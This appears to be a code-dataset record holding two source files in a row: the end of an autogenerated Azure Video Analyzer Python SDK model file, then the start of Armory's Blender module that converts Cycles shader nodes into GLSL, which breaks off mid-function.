_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'bitrate_kbps': {'key': 'bitrateKbps', 'type': 'str'},
'frame_rate': {'key': 'frameRate', 'type': 'str'},
'scale': {'key': 'scale', 'type': 'VideoScale'},
}
def __init__(
self,
**kwargs
):
super(VideoEncoderH264, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.VideoEncoderH264' # type: str
class VideoEntity(ProxyResource):
"""Represents a video resource within Azure Video Analyzer. Videos can be ingested from RTSP cameras through live pipelines or can be created by exporting sequences from existing captured video through a pipeline job. Videos ingested through live pipelines can be streamed through Azure Video Analyzer Player Widget or compatible players. Exported videos can be downloaded as MP4 files.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:param title: Optional video title provided by the user. Value can be up to 256 characters
long.
:type title: str
:param description: Optional video description provided by the user. Value can be up to 2048
characters long.
:type description: str
:ivar type_properties_type: Video content type. Different content types are suitable for
different applications and scenarios. Possible values include: "Archive", "File".
:vartype type_properties_type: str or ~video_analyzer.models.VideoType
:ivar flags: Video flags contain information about the available video actions and its dynamic
properties based on the current video state.
:vartype flags: ~video_analyzer.models.VideoFlags
:ivar content_urls: Set of URLs to the video content.
:vartype content_urls: ~video_analyzer.models.VideoContentUrls
:param media_info: Contains information about the video and audio content.
:type media_info: ~video_analyzer.models.VideoMediaInfo
:param archival: Video archival properties.
:type archival: ~video_analyzer.models.VideoArchival
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
'type_properties_type': {'readonly': True},
'flags': {'readonly': True},
'content_urls': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'title': {'key': 'properties.title', 'type': 'str'},
'description': {'key': 'properties.description', 'type': 'str'},
'type_properties_type': {'key': 'properties.type', 'type': 'str'},
'flags': {'key': 'properties.flags', 'type': 'VideoFlags'},
'content_urls': {'key': 'properties.contentUrls', 'type': 'VideoContentUrls'},
'media_info': {'key': 'properties.mediaInfo', 'type': 'VideoMediaInfo'},
'archival': {'key': 'properties.archival', 'type': 'VideoArchival'},
}
def __init__(
self,
**kwargs
):
super(VideoEntity, self).__init__(**kwargs)
self.title = kwargs.get('title', None)
self.description = kwargs.get('description', None)
self.type_properties_type = None
self.flags = None
self.content_urls = None
self.media_info = kwargs.get('media_info', None)
self.archival = kwargs.get('archival', None)
class VideoEntityCollection(msrest.serialization.Model):
"""A collection of VideoEntity items.
:param value: A collection of VideoEntity items.
:type value: list[~video_analyzer.models.VideoEntity]
:param next_link: A link to the next page of the collection (when the collection contains too
many results to return in one response).
:type next_link: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[VideoEntity]'},
'next_link': {'key': '@nextLink', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(VideoEntityCollection, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
self.next_link = kwargs.get('next_link', None)
class VideoFlags(msrest.serialization.Model):
"""Video flags contain information about the available video actions and its dynamic properties based on the current video state.
All required parameters must be populated in order to send to Azure.
:param can_stream: Required. Value indicating whether or not the video can be streamed. Only
"archive" type videos can be streamed.
:type can_stream: bool
:param has_data: Required. Value indicating whether or not there has ever been data recorded or
uploaded into the video. Newly created videos have this value set to false.
:type has_data: bool
:param is_in_use: Required. Value indicating whether or not the video is currently being
referenced be an active pipeline. The fact that is being referenced, doesn't necessarily
indicate that data is being received. For example, video recording may be gated on events or
camera may not be accessible at the time.
:type is_in_use: bool
"""
_validation = {
'can_stream': {'required': True},
'has_data': {'required': True},
'is_in_use': {'required': True},
}
_attribute_map = {
'can_stream': {'key': 'canStream', 'type': 'bool'},
'has_data': {'key': 'hasData', 'type': 'bool'},
'is_in_use': {'key': 'isInUse', 'type': 'bool'},
}
def __init__(
self,
**kwargs
):
super(VideoFlags, self).__init__(**kwargs)
self.can_stream = kwargs['can_stream']
self.has_data = kwargs['has_data']
self.is_in_use = kwargs['is_in_use']
class VideoMediaInfo(msrest.serialization.Model):
"""Contains information about the video and audio content.
:param segment_length: Video segment length indicates the length of individual video files
(segments) which are persisted to storage. Smaller segments provide lower archive playback
latency but generate larger volume of storage transactions. Larger segments reduce the amount
of storage transactions while increasing the archive playback latency. Value must be specified
in ISO8601 duration format (i.e. "PT30S" equals 30 seconds) and can vary between 30 seconds to
5 minutes, in 30 seconds increments.
:type segment_length: str
"""
_attribute_map = {
'segment_length': {'key': 'segmentLength', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(VideoMediaInfo, self).__init__(**kwargs)
self.segment_length = kwargs.get('segment_length', None)
class VideoPreviewImageUrls(msrest.serialization.Model):
"""Video preview image URLs. These URLs can be used in conjunction with the video content authorization token to download the most recent still image from the video archive in different resolutions. They are available when the video type is 'archive' and preview images are enabled.
:param small: Low resolution preview image URL.
:type small: str
:param medium: Medium resolution preview image URL.
:type medium: str
:param large: High resolution preview image URL.
:type large: str
"""
_attribute_map = {
'small': {'key': 'small', 'type': 'str'},
'medium': {'key': 'medium', 'type': 'str'},
'large': {'key': 'large', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(VideoPreviewImageUrls, self).__init__(**kwargs)
self.small = kwargs.get('small', None)
self.medium = kwargs.get('medium', None)
self.large = kwargs.get('large', None)
class VideoPublishingOptions(msrest.serialization.Model):
"""Optional flags used to change how video is published. These are only allowed for topologies where "kind" is set to "live".
:param disable_archive: When set to 'true' content will not be archived or recorded. This is
used, for example, when the topology is used only for low latency video streaming. Default is
'false'. If set to 'true', then "disableRtspPublishing" must be set to 'false'.
:type disable_archive: str
:param disable_rtsp_publishing: When set to 'true' the RTSP playback URL will not be published,
disabling low latency streaming. This is used, for example, when the topology is used only for
archiving content. Default is 'false'. If set to 'true', then "disableArchive" must be set to
'false'.
:type disable_rtsp_publishing: str
"""
_attribute_map = {
'disable_archive': {'key': 'disableArchive', 'type': 'str'},
'disable_rtsp_publishing': {'key': 'disableRtspPublishing', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(VideoPublishingOptions, self).__init__(**kwargs)
self.disable_archive = kwargs.get('disable_archive', None)
self.disable_rtsp_publishing = kwargs.get('disable_rtsp_publishing', None)
class VideoScale(msrest.serialization.Model):
"""The video scaling information.
:param height: The desired output video height.
:type height: str
:param width: The desired output video width.
:type width: str
:param mode: Describes the video scaling mode to be applied. Default mode is 'Pad'. If the mode
is 'Pad' or 'Stretch' then both width and height must be specified. Else if the mode is
'PreserveAspectRatio' then only one of width or height need be provided. Possible values
include: "Pad", "PreserveAspectRatio", "Stretch".
:type mode: str or ~video_analyzer.models.VideoScaleMode
"""
_attribute_map = {
'height': {'key': 'height', 'type': 'str'},
'width': {'key': 'width', 'type': 'str'},
'mode': {'key': 'mode', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(VideoScale, self).__init__(**kwargs)
self.height = kwargs.get('height', None)
self.width = kwargs.get('width', None)
self.mode = kwargs.get('mode', None)
class VideoSequenceAbsoluteTimeMarkers(TimeSequenceBase):
"""A sequence of absolute datetime ranges as a string. The datetime values should follow IS08601, and the sum of the ranges should add up to 24 hours or less. Currently, there can be only one range specified in the sequence.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param ranges: Required. The sequence of datetime ranges. Example: '[["2021-10-05T03:30:00Z",
"2021-10-05T03:40:00Z"]]'.
:type ranges: str
"""
_validation = {
'type': {'required': True},
'ranges': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'ranges': {'key': 'ranges', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(VideoSequenceAbsoluteTimeMarkers, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.VideoSequenceAbsoluteTimeMarkers' # type: str
self.ranges = kwargs['ranges']
class VideoSink(SinkNodeBase):
"""Video sink in a live topology allows for video and audio to be captured, optionally archived, and published via a video resource. If archiving is enabled, this results in a video of type 'archive'. If used in a batch topology, this allows for video and audio to be stored as a file, and published via a video resource of type 'file'.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param name: Required. Node name. Must be unique within the topology.
:type name: str
:param inputs: Required. An array of upstream node references within the topology to be used as
inputs for this node.
:type inputs: list[~video_analyzer.models.NodeInput]
:param video_name: Required. Name of a new or existing video resource used to capture and
publish content. Note: if downstream of RTSP source, and if disableArchive is set to true, then
no content is archived.
:type video_name: str
:param video_creation_properties: Optional video properties to be used in case a new video
resource needs to be created on the service.
:type video_creation_properties: ~video_analyzer.models.VideoCreationProperties
:param video_publishing_options: Options to change how the video sink publishes content via the
video resource. This property is only allowed for topologies where "kind" is set to "live".
:type video_publishing_options: ~video_analyzer.models.VideoPublishingOptions
"""
_validation = {
'type': {'required': True},
'name': {'required': True},
'inputs': {'required': True},
'video_name': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'inputs': {'key': 'inputs', 'type': '[NodeInput]'},
'video_name': {'key': 'videoName', 'type': 'str'},
'video_creation_properties': {'key': 'videoCreationProperties', 'type': 'VideoCreationProperties'},
'video_publishing_options': {'key': 'videoPublishingOptions', 'type': 'VideoPublishingOptions'},
}
def __init__(
self,
**kwargs
):
super(VideoSink, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.VideoSink' # type: str
self.video_name = kwargs['video_name']
self.video_creation_properties = kwargs.get('video_creation_properties', None)
self.video_publishing_options = kwargs.get('video_publishing_options', None)
class VideoSource(SourceNodeBase):
"""Video source allows for content from a Video Analyzer video resource to be ingested into a pipeline. Currently supported only with batch pipelines.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param name: Required. Node name. Must be unique within the topology.
:type name: str
:param video_name: Required. Name of the Video Analyzer video resource to be used as the
source.
:type video_name: str
:param time_sequences: Required. Describes a sequence of datetime ranges. The video source only
picks up recorded media within these ranges.
:type time_sequences: ~video_analyzer.models.TimeSequenceBase
"""
_validation = {
'type': {'required': True},
'name': {'required': True},
'video_name': {'required': True},
'time_sequences': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'video_name': {'key': 'videoName', 'type': 'str'},
'time_sequences': {'key': 'timeSequences', 'type': 'TimeSequenceBase'},
}
def __init__(
self,
**kwargs
):
super(VideoSource, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.VideoSource' # type: str
self.video_name = kwargs['video_name']
self.time_sequences = kwargs['time_sequences']
| 1.851563 | 2 |
blender/arm/material/cycles.py | philipmduarte/armory | 1 | 4993 | #
# This module builds upon Cycles nodes work licensed as
# Copyright 2011-2013 Blender Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import math
import bpy
import os
import arm.assets
import arm.utils
import arm.make_state
import arm.log
import arm.material.mat_state as mat_state
import arm.material.cycles_functions as c_functions
import shutil
emission_found = False
particle_info = None # Particle info export
def parse(nodes, con, vert, frag, geom, tesc, tese, parse_surface=True, parse_opacity=True, parse_displacement=True, basecol_only=False):
output_node = node_by_type(nodes, 'OUTPUT_MATERIAL')
if output_node != None:
parse_output(output_node, con, vert, frag, geom, tesc, tese, parse_surface, parse_opacity, parse_displacement, basecol_only)
def parse_output(node, _con, _vert, _frag, _geom, _tesc, _tese, _parse_surface, _parse_opacity, _parse_displacement, _basecol_only):
global parsed # Compute nodes only once
global parents
global normal_parsed
global curshader # Active shader - frag for surface / tese for displacement
global con
global vert
global frag
global geom
global tesc
global tese
global parse_surface
global parse_opacity
global basecol_only
global emission_found
global particle_info
global sample_bump
global sample_bump_res
con = _con
vert = _vert
frag = _frag
geom = _geom
tesc = _tesc
tese = _tese
parse_surface = _parse_surface
parse_opacity = _parse_opacity
basecol_only = _basecol_only
emission_found = False
particle_info = {}
particle_info['index'] = False
particle_info['age'] = False
particle_info['lifetime'] = False
particle_info['location'] = False
particle_info['size'] = False
particle_info['velocity'] = False
particle_info['angular_velocity'] = False
sample_bump = False
sample_bump_res = ''
wrd = bpy.data.worlds['Arm']
# Surface
if parse_surface or parse_opacity:
parsed = {}
parents = []
normal_parsed = False
curshader = frag
out_basecol, out_roughness, out_metallic, out_occlusion, out_specular, out_opacity, out_emission = parse_shader_input(node.inputs[0])
if parse_surface:
frag.write('basecol = {0};'.format(out_basecol))
frag.write('roughness = {0};'.format(out_roughness))
frag.write('metallic = {0};'.format(out_metallic))
frag.write('occlusion = {0};'.format(out_occlusion))
frag.write('specular = {0};'.format(out_specular))
if '_Emission' in wrd.world_defs:
frag.write('emission = {0};'.format(out_emission))
if parse_opacity:
frag.write('opacity = {0} - 0.0002;'.format(out_opacity))
# Volume
# parse_volume_input(node.inputs[1])
# Displacement
if _parse_displacement and disp_enabled() and node.inputs[2].is_linked:
parsed = {}
parents = []
normal_parsed = False
rpdat = arm.utils.get_rp()
if rpdat.arm_rp_displacement == 'Tessellation' and tese != None:
curshader = tese
else:
curshader = vert
out_disp = parse_displacement_input(node.inputs[2])
curshader.write('vec3 disp = {0};'.format(out_disp))
def parse_group(node, socket): # Entering group
index = socket_index(node, socket)
output_node = node_by_type(node.node_tree.nodes, 'GROUP_OUTPUT')
if output_node == None:
return
inp = output_node.inputs[index]
parents.append(node)
out_group = parse_input(inp)
parents.pop()
return out_group
def parse_group_input(node, socket):
index = socket_index(node, socket)
parent = parents.pop() # Leaving group
inp = parent.inputs[index]
res = parse_input(inp)
parents.append(parent) # Return to group
return res
def parse_input(inp):
if inp.type == 'SHADER':
return parse_shader_input(inp)
elif inp.type == 'RGB':
return parse_vector_input(inp)
elif inp.type == 'RGBA':
return parse_vector_input(inp)
elif inp.type == 'VECTOR':
return parse_vector_input(inp)
elif inp.type == 'VALUE':
return parse_value_input(inp)
def parse_shader_input(inp):
if inp.is_linked:
l = inp.links[0]
if l.from_node.type == 'REROUTE':
return parse_shader_input(l.from_node.inputs[0])
return parse_shader(l.from_node, l.from_socket)
else:
out_basecol = 'vec3(0.8)'
out_roughness = '0.0'
out_metallic = '0.0'
out_occlusion = '1.0'
out_specular = '1.0'
out_opacity = '1.0'
out_emission = '0.0'
return out_basecol, out_roughness, out_metallic, out_occlusion, out_specular, out_opacity, out_emission
def parse_shader(node, socket):
global emission_found
out_basecol = 'vec3(0.8)'
out_roughness = '0.0'
out_metallic = '0.0'
out_occlusion = '1.0'
out_specular = '1.0'
out_opacity = '1.0'
out_emission = '0.0'
if node.type == 'GROUP':
if node.node_tree.name.startswith('Armory PBR'):
if parse_surface:
# Base color
out_basecol = parse_vector_input(node.inputs[0])
# Occlusion
out_occlusion = parse_value_input(node.inputs[2])
# Roughness
out_roughness = parse_value_input(node.inputs[3])
# Metallic
out_metallic = parse_value_input(node.inputs[4])
# Normal
if node.inputs[5].is_linked and node.inputs[5].links[0].from_node.type == 'NORMAL_MAP':
warn(mat_name() + ' - Do not use Normal Map node with Armory PBR, connect Image Texture directly')
parse_normal_map_color_input(node.inputs[5])
# Emission
if node.inputs[6].is_linked or node.inputs[6].default_value != 0.0:
out_emission = parse_value_input(node.inputs[6])
emission_found = True
if parse_opacity:
out_opacity = parse_value_input(node.inputs[1])
else:
return parse_group(node, socket)
elif node.type == 'GROUP_INPUT':
return parse_group_input(node, socket)
elif node.type == 'MIX_SHADER':
prefix = '' if node.inputs[0].is_linked else 'const '
fac = parse_value_input(node.inputs[0])
fac_var = node_name(node.name) + '_fac'
fac_inv_var = node_name(node.name) + '_fac_inv'
curshader.write('{0}float {1} = {2};'.format(prefix, fac_var, fac))
curshader.write('{0}float {1} = 1.0 - {2};'.format(prefix, fac_inv_var, fac_var))
bc1, rough1, met1, occ1, spec1, opac1, emi1 = parse_shader_input(node.inputs[1])
bc2, rough2, met2, occ2, spec2, opac2, emi2 = parse_shader_input(node.inputs[2])
if parse_surface:
out_basecol = '({0} * {3} + {1} * {2})'.format(bc1, bc2, fac_var, fac_inv_var)
out_roughness = '({0} * {3} + {1} * {2})'.format(rough1, rough2, fac_var, fac_inv_var)
out_metallic = '({0} * {3} + {1} * {2})'.format(met1, met2, fac_var, fac_inv_var)
out_occlusion = '({0} * {3} + {1} * {2})'.format(occ1, occ2, fac_var, fac_inv_var)
out_specular = '({0} * {3} + {1} * {2})'.format(spec1, spec2, fac_var, fac_inv_var)
out_emission = '({0} * {3} + {1} * {2})'.format(emi1, emi2, fac_var, fac_inv_var)
if parse_opacity:
out_opacity = '({0} * {3} + {1} * {2})'.format(opac1, opac2, fac_var, fac_inv_var)
elif node.type == 'ADD_SHADER':
bc1, rough1, met1, occ1, spec1, opac1, emi1 = parse_shader_input(node.inputs[0])
bc2, rough2, met2, occ2, spec2, opac2, emi2 = parse_shader_input(node.inputs[1])
if parse_surface:
out_basecol = '({0} + {1})'.format(bc1, bc2)
out_roughness = '({0} * 0.5 + {1} * 0.5)'.format(rough1, rough2)
out_metallic = '({0} * 0.5 + {1} * 0.5)'.format(met1, met2)
out_occlusion = '({0} * 0.5 + {1} * 0.5)'.format(occ1, occ2)
out_specular = '({0} * 0.5 + {1} * 0.5)'.format(spec1, spec2)
out_emission = '({0} * 0.5 + {1} * 0.5)'.format(emi1, emi2)
if parse_opacity:
out_opacity = '({0} * 0.5 + {1} * 0.5)'.format(opac1, opac2)
elif node.type == 'BSDF_PRINCIPLED':
if parse_surface:
write_normal(node.inputs[19])
out_basecol = parse_vector_input(node.inputs[0])
# subsurface = parse_vector_input(node.inputs[1])
# subsurface_radius = parse_vector_input(node.inputs[2])
# subsurface_color = parse_vector_input(node.inputs[3])
out_metallic = parse_value_input(node.inputs[4])
out_specular = parse_value_input(node.inputs[5])
# specular_tint = parse_vector_input(node.inputs[6])
out_roughness = parse_value_input(node.inputs[7])
# aniso = parse_vector_input(node.inputs[8])
# aniso_rot = parse_vector_input(node.inputs[9])
# sheen = parse_vector_input(node.inputs[10])
# sheen_tint = parse_vector_input(node.inputs[11])
# clearcoat = parse_vector_input(node.inputs[12])
# clearcoat_rough = parse_vector_input(node.inputs[13])
# ior = parse_vector_input(node.inputs[14])
# transmission = parse_vector_input(node.inputs[15])
# transmission_roughness = parse_vector_input(node.inputs[16])
if node.inputs[17].is_linked or node.inputs[17].default_value[0] != 0.0:
out_emission = '({0}.x)'.format(parse_vector_input(node.inputs[17]))
emission_found = True
# clearcoar_normal = parse_vector_input(node.inputs[20])
# tangent = parse_vector_input(node.inputs[21])
if parse_opacity:
if len(node.inputs) > 20:
out_opacity = parse_value_input(node.inputs[18])
elif node.type == 'BSDF_DIFFUSE':
if parse_surface:
write_normal(node.inputs[2])
out_basecol = parse_vector_input(node.inputs[0])
out_roughness = parse_value_input(node.inputs[1])
out_specular = '0.0'
elif node.type == 'BSDF_GLOSSY':
if parse_surface:
write_normal(node.inputs[2])
out_basecol = parse_vector_input(node.inputs[0])
out_roughness = parse_value_input(node.inputs[1])
out_metallic = '1.0'
elif node.type == 'AMBIENT_OCCLUSION':
if parse_surface:
# Single channel
out_occlusion = parse_vector_input(node.inputs[0]) + '.r'
elif node.type == 'BSDF_ANISOTROPIC':
if parse_surface:
write_normal(node.inputs[4])
# Revert to glossy
out_basecol = parse_vector_input(node.inputs[0])
out_roughness = parse_value_input(node.inputs[1])
out_metallic = '1.0'
elif node.type == 'EMISSION':
if parse_surface:
# Multiply basecol
out_basecol = parse_vector_input(node.inputs[0])
out_emission = '1.0'
emission_found = True
emission_strength = parse_value_input(node.inputs[1])
out_basecol = '({0} * {1})'.format(out_basecol, emission_strength)
elif node.type == 'BSDF_GLASS':
if parse_surface:
write_normal(node.inputs[3])
out_roughness = parse_value_input(node.inputs[1])
if parse_opacity:
out_opacity = '(1.0 - {0}.r)'.format(parse_vector_input(node.inputs[0]))
elif node.type == 'BSDF_HAIR':
pass
elif node.type == 'HOLDOUT':
if parse_surface:
# Occlude
out_occlusion = '0.0'
elif node.type == 'BSDF_REFRACTION':
# write_normal(node.inputs[3])
pass
elif node.type == 'SUBSURFACE_SCATTERING':
if parse_surface:
write_normal(node.inputs[4])
out_basecol = parse_vector_input(node.inputs[0])
elif node.type == 'BSDF_TOON':
# write_normal(node.inputs[3])
pass
elif node.type == 'BSDF_TRANSLUCENT':
if parse_surface:
write_normal(node.inputs[1])
if parse_opacity:
out_opacity = '(1.0 - {0}.r)'.format(parse_vector_input(node.inputs[0]))
elif node.type == 'BSDF_TRANSPARENT':
if parse_opacity:
out_opacity = '(1.0 - {0}.r)'.format(parse_vector_input(node.inputs[0]))
elif node.type == 'BSDF_VELVET':
if parse_surface:
write_normal(node.inputs[2])
out_basecol = parse_vector_input(node.inputs[0])
out_roughness = '1.0'
out_metallic = '1.0'
elif node.type == 'VOLUME_ABSORPTION':
pass
elif node.type == 'VOLUME_SCATTER':
pass
return out_basecol, out_roughness, out_metallic, out_occlusion, out_specular, out_opacity, out_emission
def parse_displacement_input(inp):
if inp.is_linked:
l = inp.links[0]
if l.from_node.type == 'REROUTE':
return parse_displacement_input(l.from_node.inputs[0])
return parse_vector_input(inp)
else:
return None
def parse_vector_input(inp):
if inp.is_linked:
l = inp.links[0]
if l.from_node.type == 'REROUTE':
return parse_vector_input(l.from_node.inputs[0])
res_var = write_result(l)
st = l.from_socket.type
if st == 'RGB' or st == 'RGBA' or st == 'VECTOR':
return res_var
else: # VALUE
return 'vec3({0})'.format(res_var)
else:
if inp.type == 'VALUE': # Unlinked reroute
return to_vec3([0.0, 0.0, 0.0])
else:
if mat_batch() and inp.is_uniform:
return to_uniform(inp)
else:
return to_vec3(inp.default_value)
def parse_vector(node, socket):
global particle_info
global sample_bump
global sample_bump_res
# RGB
if node.type == 'GROUP':
return parse_group(node, socket)
elif node.type == 'GROUP_INPUT':
return parse_group_input(node, socket)
elif node.type == 'VERTEX_COLOR':
con.add_elem('col', 'short4norm') # Vcols only for now
return 'vcolor'
elif node.type == 'ATTRIBUTE':
if socket == node.outputs[0]: # Color
con.add_elem('col', 'short4norm') # Vcols only for now
return 'vcolor'
else: # Vector
con.add_elem('tex', 'short2norm') # UVMaps only for now
mat = mat_get_material()
mat_users = mat_get_material_users()
if mat_users != None and mat in mat_users:
mat_user = mat_users[mat][0]
if hasattr(mat_user.data, 'uv_layers'): # No uvlayers for Curve
lays = mat_user.data.uv_layers
# Second uvmap referenced
if len(lays) > 1 and node.attribute_name == lays[1].name:
con.add_elem('tex1', 'short2norm')
return 'vec3(texCoord1.x, 1.0 - texCoord1.y, 0.0)'
return 'vec3(texCoord.x, 1.0 - texCoord.y, 0.0)'
elif node.type == 'RGB':
if node.arm_material_param:
nn = 'param_' + node_name(node.name)
curshader.add_uniform('vec3 {0}'.format(nn), link='{0}'.format(node.name))
return nn
else:
return to_vec3(socket.default_value)
elif node.type == 'TEX_BRICK':
curshader.add_function(c_functions.str_tex_brick)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
col1 = parse_vector_input(node.inputs[1])
col2 = parse_vector_input(node.inputs[2])
col3 = parse_vector_input(node.inputs[3])
scale = parse_value_input(node.inputs[4])
res = 'tex_brick({0} * {4}, {1}, {2}, {3})'.format(co, col1, col2, col3, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_CHECKER':
curshader.add_function(c_functions.str_tex_checker)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
col1 = parse_vector_input(node.inputs[1])
col2 = parse_vector_input(node.inputs[2])
scale = parse_value_input(node.inputs[3])
res = 'tex_checker({0}, {1}, {2}, {3})'.format(co, col1, col2, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_ENVIRONMENT':
# Pass through
return to_vec3([0.0, 0.0, 0.0])
elif node.type == 'TEX_GRADIENT':
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
grad = node.gradient_type
if grad == 'LINEAR':
f = '{0}.x'.format(co)
elif grad == 'QUADRATIC':
f = '0.0'
elif grad == 'EASING':
f = '0.0'
elif grad == 'DIAGONAL':
f = '({0}.x + {0}.y) * 0.5'.format(co)
elif grad == 'RADIAL':
f = 'atan({0}.y, {0}.x) / PI2 + 0.5'.format(co)
elif grad == 'QUADRATIC_SPHERE':
f = '0.0'
elif grad == 'SPHERICAL':
f = 'max(1.0 - sqrt({0}.x * {0}.x + {0}.y * {0}.y + {0}.z * {0}.z), 0.0)'.format(co)
res = 'vec3(clamp({0}, 0.0, 1.0))'.format(f)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_IMAGE':
# Already fetched
if is_parsed(store_var_name(node)):
return '{0}.rgb'.format(store_var_name(node))
tex_name = node_name(node.name)
tex = make_texture(node, tex_name)
tex_link = node.name if node.arm_material_param else None
if tex != None:
curshader.write_textures += 1
to_linear = node.image != None and node.image.colorspace_settings.name == 'sRGB'
res = '{0}.rgb'.format(texture_store(node, tex, tex_name, to_linear, tex_link=tex_link))
curshader.write_textures -= 1
return res
elif node.image == None: # Empty texture
tex = {}
tex['name'] = tex_name
tex['file'] = ''
return '{0}.rgb'.format(texture_store(node, tex, tex_name, to_linear=False, tex_link=tex_link))
else:
global parsed
tex_store = store_var_name(node) # Pink color for missing texture
parsed[tex_store] = True
curshader.write_textures += 1
curshader.write('vec4 {0} = vec4(1.0, 0.0, 1.0, 1.0);'.format(tex_store))
curshader.write_textures -= 1
return '{0}.rgb'.format(tex_store)
elif node.type == 'TEX_MAGIC':
curshader.add_function(c_functions.str_tex_magic)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
res = 'tex_magic({0} * {1} * 4.0)'.format(co, scale)
if sample_bump:
write_bump(node, res, 0.1)
return res
elif node.type == 'TEX_MUSGRAVE':
curshader.add_function(c_functions.str_tex_musgrave)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
# detail = parse_value_input(node.inputs[2])
# distortion = parse_value_input(node.inputs[3])
res = 'vec3(tex_musgrave_f({0} * {1} * 0.5))'.format(co, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_NOISE':
curshader.add_function(c_functions.str_tex_noise)
assets_add(get_sdk_path() + '/armory/Assets/' + 'noise256.png')
assets_add_embedded_data('noise256.png')
curshader.add_uniform('sampler2D snoise256', link='$noise256.png')
curshader.add_function(c_functions.str_tex_noise)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
# detail = parse_value_input(node.inputs[2])
# distortion = parse_value_input(node.inputs[3])
# Slow..
res = 'vec3(tex_noise({0} * {1}), tex_noise({0} * {1} + 0.33), tex_noise({0} * {1} + 0.66))'.format(co, scale)
if sample_bump:
write_bump(node, res, 0.1)
return res
elif node.type == 'TEX_POINTDENSITY':
# Pass through
return to_vec3([0.0, 0.0, 0.0])
elif node.type == 'TEX_SKY':
# Pass through
return to_vec3([0.0, 0.0, 0.0])
elif node.type == 'TEX_VORONOI':
curshader.add_function(c_functions.str_tex_voronoi)
assets_add(get_sdk_path() + '/armory/Assets/' + 'noise256.png')
assets_add_embedded_data('noise256.png')
curshader.add_uniform('sampler2D snoise256', link='$noise256.png')
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
if node.coloring == 'INTENSITY':
res = 'vec3(tex_voronoi({0} * {1}).a)'.format(co, scale)
else: # CELLS
res = 'tex_voronoi({0} * {1}).rgb'.format(co, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_WAVE':
curshader.add_function(c_functions.str_tex_wave)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
res = 'vec3(tex_wave_f({0} * {1}))'.format(co, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'BRIGHTCONTRAST':
out_col = parse_vector_input(node.inputs[0])
bright = parse_value_input(node.inputs[1])
contr = parse_value_input(node.inputs[2])
curshader.add_function(c_functions.str_brightcontrast)
return 'brightcontrast({0}, {1}, {2})'.format(out_col, bright, contr)
elif node.type == 'GAMMA':
out_col = parse_vector_input(node.inputs[0])
gamma = parse_value_input(node.inputs[1])
return 'pow({0}, vec3({1}))'.format(out_col, gamma)
elif node.type == 'HUE_SAT':
curshader.add_function(c_functions.str_hue_sat)
hue = parse_value_input(node.inputs[0])
sat = parse_value_input(node.inputs[1])
val = parse_value_input(node.inputs[2])
fac = parse_value_input(node.inputs[3])
col = parse_vector_input(node.inputs[4])
